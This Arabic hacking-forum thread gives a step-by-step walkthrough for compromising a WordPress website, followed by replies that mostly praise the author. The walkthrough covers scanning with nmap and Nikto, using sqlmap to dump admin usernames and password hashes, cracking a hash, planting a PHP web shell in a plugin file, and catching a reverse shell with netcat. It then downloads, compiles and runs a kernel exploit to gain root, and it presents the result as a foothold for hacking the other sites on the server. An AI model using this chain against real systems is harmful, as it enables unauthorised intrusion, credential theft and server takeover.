حالة الموضوع:
مغلق
  1. Mr. virus

    Mr. virus Developer

    الأنتساب:
    ‏8 مارس 2012
    المشاركات:
    23
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:
    الأمارات
    [​IMG]

    صباح الخير عليكم جميعا اعضاء وزوار شبكة عراق تيم

    اليوم معنى موضوع مفيد جدآ


    سوف نبدأ في طرح عدة طرق لاختراق موقع بواسطة ادوات الاختبار


    والتعرف علي وظيفة كل اداة في الشرح عمليا


    والاختراق يبدأ من جمع المعلومات الي اخذ الروت بأذن الله


    لكي نبدأ في اي عملية اختراق لاي موفع علينا اولا جمع معلومات مهمه


    مثل نوع السكربت علي الموقع ايبي السيرفر الويب السيرفر اذا كان اباتشي او غيره


    السيرفر يستخدم لينكس او ويندوز الشرح سوف يكون علي دومين افتراضي


    الان ستخدم احدي اختبار الاختراق وهي
    Whatweb تعطيك جميع المعلومات عن الموقع :

    نفتح الاداة ونكتب الامر بعدها رابط الموقع ثل الصوره


    [​IMG]


    الان نلاحظ المعلومات التي ضهرت لنا


    [​IMG]


    الان ظهر الايبي واصدار الاباتشي
    (2.2.15) والسيرفر يعمل علي (fedora linux) والسكربت (wordpress)

    هذه جميع المعلومات المهمه التي نحتاجها الان نحتاج لمعرفة البورتات المفتوحه في السيرفر


    وذلك عن طريق الاداة العملاقه
    Nmap طبعا توجد واجهه رسوميه لها وسهلة الاستخدام

    ولكني افضل العمل علي الطرفيه الان نكتب في الطرفيه nmap


    ثم للعثور علي الورتات المفتوحه nmap -sV hack-test.com


    ثم نري النتيجه


    كود PHP:
    root@bt:/# nmap -sV hack-test.com 

    Starting Nmap 5.59BETA1 http://nmap.org ) at 2011-12-28 06:39 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.0013s latency).
    Not shown998 filtered ports
    PORT STATE SERVICE VERSION
    22
    /tcp closed ssh
    80
    /tcp open http Apache httpd 2.2.15 ((Fedora))
    MAC Address00:0C:29:01:8A:4D (VMware

    Service detection performedPlease report any incorrect results at http://nmap.org/submit/ . 

    Nmap done1 IP address (1 host upscanned in 11.56 seconds

    ثم هذا الامر لنري الملقم يعني السيرفر ويندوز او لينكس واي توزيعه بالتحديد nmap -O hack-test.com

    هذه النتيجه


    كود PHP:
    root@bt:/# nmap -O hack-test.com 

    Starting Nmap 5.59BETA1 http://nmap.org ) at 2011-12-28 06:40 EET
    Nmap scan report for hack-test.com (192.168.1.2)
    Host is up (0.00079s latency).
    Not shown998 filtered ports
    PORT STATE SERVICE
    22
    /tcp closed ssh 

    80
    /tcp open http
    MAC Address
    00:0C:29:01:8A:4D (VMware)
    Device typegeneral purpose
    Running
    Linux 2.6.X
    OS details
    Linux 2.6.22 (Fedora Core 6)
    Network Distance1 hop 

    OS detection performed
    Please report any incorrect results at http://nmap.org/submit/ . 

    Nmap done1 IP address (1 host upscanned in 7.42 seconds
    الان ماذا نستنتج من هذا الفحص السريع نعرف البورت المفتوح

    الخاص به هو
    Port 80 التوزيعه التي يعمل عليها السيرفر Linux 2.6.22(Fedora Core 6)

    الان لدينا نتيجه جيده جدا نأتي الان للأهم وهو المسح

    علي الموقع لأكتشاف الثغرات ونقاط الضعف يعني اي ثغره او خطأ برمجي لنستغله مثل


    Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF


    الان سوف نستخدم اداتين
    W3AF, Nikto وهي موجوده في الباك تراك فقط

    لاني جربت اكثر من توزيعة اختبار امان ولم اجدها وهذا احد اسباب انتقالي الي الباك تراك


    المهم وضيفة هذه الادوات عمل مسح علي الموقع للكشف عن الاخطاء البرمجيه


    والثغرات الامنيه والدوال الخطيره المفتوحه نفتح الاداة Nikto ثم نكتب هذا الامر


    perl nikto.pl -h Level 1

    ونري النتيجه


    كود PHP:
    Nikto v2.1.4  

    --------------------------------------------------------------------------- 

    Target IP192.168.1.2
    Target Hostnamehack-test.com
    Target Port80
    Start Time2011-12-29 06:50:03 

    --------------------------------------------------------------------------- 

    ServerApache/2.2.15 (Fedora)
    ETag header found on serverinode12748size1475mtime0x4996d177f5c3b
    Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
    Allowed HTTP MethodsGETHEADPOSTOPTIONSTRACE
    OSVDB-877HTTP TRACE method is activesuggesting the host is vulnerable to XST
    OSVDB-3268: /icons/: Directory indexing found.
    OSVDB-3233: /icons/READMEApache default file found.
    6448 items checked1 error(s) and 6 item(sreported on remote host
    End Time2011-12-29 06:50:37 (34 seconds

    --------------------------------------------------------------------------- 

    1 host(stested
    [​IMG]

    [​IMG]

    الان نفتح الاداة الثانيه W3AF ونكتب بها هذا الامر ./w3af_gui

    كود PHP:
    root@bt:/pentest/web/w3af# ./w3af_gui 

    Starting w3afrunning on:
    Python version:
    2.6.5 (r265:79063Apr 16 201013:57:41)
    [
    GCC 4.4.3]
    GTK version2.20.1
    PyGTK version
    2.17.0 

    w3af 
    Web Application Attack and Audit Framework
    Version
    1.2
    Revision
    4605
    Author
    Andres Riancho and the w3af team.
    [​IMG]

    تفتح لنا الواجهه الرسوميه نكتب بها رابط الموقع فقط مثل الصور

    [​IMG]

    بعد الانتظار قليلا سوف تظهر لك النتائج والمثال في الصوره القادمه

    [​IMG]

    نري في الصوره انت الموقع به ثغرت SQL و XSS

    نري ثغرة الــ SQL


    [​IMG]

    حيث ان الرابط الموضح في الصوره في مكان الثغره والنقطه الاضعف

    لذلك دعونا نستغل هذه الثغره


    [​IMG]


    سوف نجد ان هذا النوع من الحقن فشل لذلك سوف نستخدم نوع sqlmap

    ولكن يجب ان نكتب قبل الرابط
    http:// مهمه جدا تابع الصور تتحدث

    [​IMG]


    بعد لحظات سوف نري


    [​IMG]


    اكتب y ثم اضغط انتر للمتابعه


    [​IMG]


    كما نري في الصوره السابقه انه الموقع معرض لثغرة
    sql vulnerable واصدار قاعدة البيانات

    هو الخامس 5


    الان سوف نعثر علي كافة قواعد البيانات علي الموقع بأضافة
    “–dbs ”

    [​IMG]


    الان عثرنا علي 3 قواعد بيانات


    [​IMG]


    سوف نقوم بعرض جداول الورد برس بواسطة اضافة
    “–D wordpress –tables ”

    [​IMG]


    الان ظهرت لدينا الجداول


    [​IMG]


    [​IMG]

    الي الان كل شي تمام نريد معرفة اهم شئ من الجداول وهي جداول الـ “wp_users”

    لانها تحتوي علي اسم المدير وكلمة السر للدخول بها الي لوحة تحكم الورد بريس لرفع الشل


    واستخراج جدول اليوزر بأضافة
    “-T wp_users –columns ”

    [​IMG]

    الان وجدنا 22 عمود


    [​IMG]

    نحن فقط نحتاج الي اعمدة (user_login and user_pass ) لاستخراج اسم المدير والباسوورد

    نضيف
    -C user_login,user_pass –dump

    سوف تظهر لنا اسم المستخدم والباسوورد

    [​IMG]


    الان لدينا مشكله بسيطه وهي الباسوورد طبعا دائما يكون مشفر ونحتاج الي فكه

    توجد عدة طرق لذلك ولكن سوف اذكر اسهلها واسرعها وهو هذا الموقع


    Online Hash Crack MD5 / LM / NTLM / SHA1 / MySQL5 / MySQL323 / MD4 / WPA / WPA2 - Passwords recovery - Reverse hash lookup Online - Hash Calculator

    نكتب الهاش الرقم المشفر ثم نري النتيجه


    [​IMG]



    الباسوورد هو
    q1w2e3

    اليوزر GeorgeMiller


    نذهب الي لوحة تحكم الورد بريس ضيف هذه بعد الرابط
    “wp-admin ”

    [​IMG]

    ثم ندخل الي

    [​IMG]


    الان نحتاج الي رفع شل علي السيرفر لذلك ندخل الي plugin ثم نختار Textile


    [​IMG]

    ثم نختار edit it

    [​IMG]

    الان نستبدل هذا المحتوي بمحتوي الشل ونضغط update file

    [​IMG]

    الان الشل سوف يعمل ولكن نحتاج الي اخذ الروت علي السيرفر لاختراق باقي المواقع

    علي السيرفر لذلك نختار الاتصال العكسي نختار
    back-connect ثم نضع الايبي الخاص بنا

    ورقم البورت الذي سوف يتم من خلاله الاتصال


    [​IMG]

    الان نذهب الي الطرفيه ونكتب الامر nc -lvvp 5555 حيث 5555 هو البورت الذي يتم من خلاله الاتصال

    [​IMG]


    الان تم الاتصال


    [​IMG]


    الان نجرب بعض اوامر اللينكس مثل
    id لاظهار الصلاحيات علي السيرفر

    uid=48(apache) gid=489(apache) groups=489(apache)


    والامر
    pwd لمعرفة مكانك علي السيرفر

    [​IMG]

    الان نستخدم الامر uname -a لأظهار الكيرنال الخاص بسيرفر

    هذا الناتج الذي ظهر
    kernel version is 2.6.31.5-127.fc12.1686 وهو كيرنال السيرفر

    الان توجه الي موقع
    exploit-db.com ونكتب في البحث “kernel 2.6.31 ”

    سوف تظهر لدينا الكيرنالات بعدة اصدارات وتحديثات نختار المنايب والمطابق منها

    جلبت لكم احدها الخاصه بهذا الكيرنال للتوضيح


    Linux RDS Protocol Local Privilege Escalation


    الان بعد ان اخترنا الكيرنل المناسب ننسخ الرابط الخاص بها ونضع هذا المر في الطرفيه
    wget وبعدها

    رابط الكيرنال الذي اخترناه ونسخنه رابطه يعني الامر يكون بهذا الشكل


    wget http://www.exploit-db.com/download/15285 -O roro.c

    استخدمنا الامر
    -O لتسميته الي roro.c

    ويتم حفظ الاسم بأمتداد c يعني لغة السي لان الثغره تكون مكتوبة بهذه اللغه


    الان نكتب
    gcc roro.c –o roro

    [​IMG]


    ثم نشغل الثغره بواطة هذا الامر
    ./roro

    الان نكتب الامر
    id لمعرفة صلاحياتنا علي السيرفر

    نري انها اصبحت
    uid=0(root) gid=0(root)

    [​IMG]



    اتمني ان يكون الشرح مفهوم وبسيط واعتذر منكم علي الاطاله


    تحياتي
     
  2. ряоfеѕѕіопаL

    ряоfеѕѕіопаL V • I • P

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    115
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    مدريد
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    وعليكمـ السلامـ ورحمة الله وبركاته

    سلمت ع الطررح وابدعت بالشرح

    بالنسبة لبرنامج w3af

    تقدر تستغل الثغرة عن طريقه

    بس تعدل الكونفق الخاص بالاستغلال

    [YOUTUBE]13fvVM9-4Vw[/YOUTUBE]
     
  3. هوك

    هوك DeveloPer Plus

    الأنتساب:
    ‏17 نوفمبر 2011
    المشاركات:
    110
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    عـــدن
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    أسسسسسد وآلله أسد

    كفو ويعطيك ألف عآفية على طرحك آلقوي وآلمؤثر

    تحيآتي لسموك &:":=)
     
  4. Mr. virus

    Mr. virus Developer

    الأنتساب:
    ‏8 مارس 2012
    المشاركات:
    23
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:
    الأمارات
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    منور يا العزيز وبأذن الله القادم افضل :{12}:

    فعلا تابعت الشرح بصراحه هذه اللاداء لها امكانيات #:"

    كثيره جدا بأذن الله سوف نستعين بك في المواضيع القادمه :{21}:
     
  5. Mr.ExiT

    Mr.ExiT DeveloPer Plus

    الأنتساب:
    ‏10 مايو 2012
    المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    D4taB4s3
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    بارك الله فيك

    انا حاليا لنكس ,. ورح اتفضى للادوات هذي
    :{3}: ​
     
  6. سيف الأسلام

    سيف الأسلام Developer

    الأنتساب:
    ‏17 يونيو 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الوظيفة:
    طالب مدرسه
    الإقامة:
    بغداد
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    وعليكم السلام

    مااشاء الله تبارك الله شرح ولا اروع وابداع لا متناهي ..*:"
    بيض الله وججهك ومنتضر شروحاتك بفارغ الصبر ..:{17}:

    ودي واحترامي..
     
  7. HADLAR

    HADLAR Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    dz
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    ابداع خويا ربي يوفقك على مجهودك

    &:":​
     
  8. Dr.LoranS

    Dr.LoranS Developer

    الأنتساب:
    ‏18 مايو 2012
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    hacker
    الإقامة:
    saudia
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    الله يعطيك العافيه حبيبي


    مجهــود جبار


    الله يوفقك

    &:":​
     
  9. Xx 5rMoSh xX

    Xx 5rMoSh xX Developer

    الأنتساب:
    ‏8 يوليو 2012
    المشاركات:
    127
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الإقامة:
    ~الاردن~
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    مبدع والله + أستمر يَ بطل
     
  10. العميل

    العميل Developer

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    14
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    Student
    الإقامة:
    codeER
    رد: حصريآ على شبكة عراق تيم اختراق موقع بواسطة ادوات الاختبار Penetration test

    موضوع قيم

    جزاك الله خيرا
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة